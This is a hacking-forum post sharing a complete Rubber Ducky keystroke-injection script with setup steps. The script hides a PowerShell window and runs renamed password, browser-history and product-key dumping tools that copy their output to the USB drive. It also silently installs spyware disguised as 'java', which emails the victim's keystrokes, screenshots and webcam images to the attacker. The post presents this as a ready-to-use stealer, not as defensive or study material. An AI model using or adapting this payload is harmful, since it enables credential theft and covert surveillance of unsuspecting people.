Jump to content
Hak5 Forums
W1L5T3R

Stealer for Rubber Ducky twin

Recommended Posts

Standing on the shoulders of giants on this one :) shout out to them

This will do the following:

1. Move the powershell dialogue  (small size) to the bottom of the screen 

2. steal all browser passwords and dump them onto the rubber ducky

3. steal all browser history and dump them onto the rubber ducky

4. steal product keys and dump them onto the rubber ducky (everything installed which needs a product key it will dump)

5. silently install sAINT and then dump keystrokes, screenshot and webcam snap to your email (disguised as java and not detected)

All of this from plugging in the rubber duck to removing is within 10 seconds. 

I just adjusted the coding a little and got it running quickly and silently.

to make sAINT work - use a linux machine (kali or parrot or whatever) and download sAINT and compile the .exe... rename the .exe to whatever you like and store on the rubber ducky.

download browser history, browser password viewer and product key viewer from here: https://www.nirsoft.net/

rename them to whatever you like and use encoder to make the inject.bin 

here is a copy of the script:

DELAY 300
REM CLOSES ALL WINDOWS THAT ARE OPEN 
GUI d
DELAY 200
REM OPEN RUN BOX 
GUI r
DELAY 100
REM OPENS POWERSHELL 
STRING powershell.exe
DELAY 100
ENTER
DELAY 100
REM CHANGES TERMINAL TO SMALL BOX
STRING MODE CON:COLS=18 LINES=1
DELAY 100
ENTER
DELAY 100
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM SETS THE PATH FOR THE USB DRIVE AND CHANGES LABEL TO _  (underscore)
STRING $usbPath = GET-WMIObject Win32_Volume | ? { $_.label -eq '_' } | select name
ENTER
DELAY 100
REM CD INTO USB DRIVE 
STRING cd $usbPath.name
ENTER
REM RUNS BROWSER PASS STEALER SILENTLY AND STORES TEXT FILE ON USB 
STRING ./WinUpdate1 /stext win1log.txt   <<<<<<renamed to WinUpdate1>>>>>>
DELAY 100
ENTER
REM RUNS BROWSER HISTORY STEALER SILENTLY AND STORES IT ON USB DRIVE AS TEXT FILE
STRING ./WinUpdate2 /stext win2log.txt    <<<<<<<renamed to WinUpdate2>>>>>
DELAY 100
ENTER
REM RUNS PRODUCT KEY STEALER SILENTLY AND STORES IT ON USB DRIVE AS TEXT FILE
STRING ./PKV /stext pkvlog.txt    <<<<<<renamed to PKV>>>>>>
DELAY 100
ENTER
DELAY 200
REM RUNS SAINT LOGGER SILENTLY AND REPORTS TO YOUR EMAIL SCREENSHOT AND KEYSTROKES PLUS WEBCAM SNAP
STRING ./java      <<<<<I renamed the sAint.exe to java>>>>>
DELAY 100
ENTER
STRING exit
ENTER

 

 

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

  • Recently Browsing   0 members

    No registered users viewing this page.

×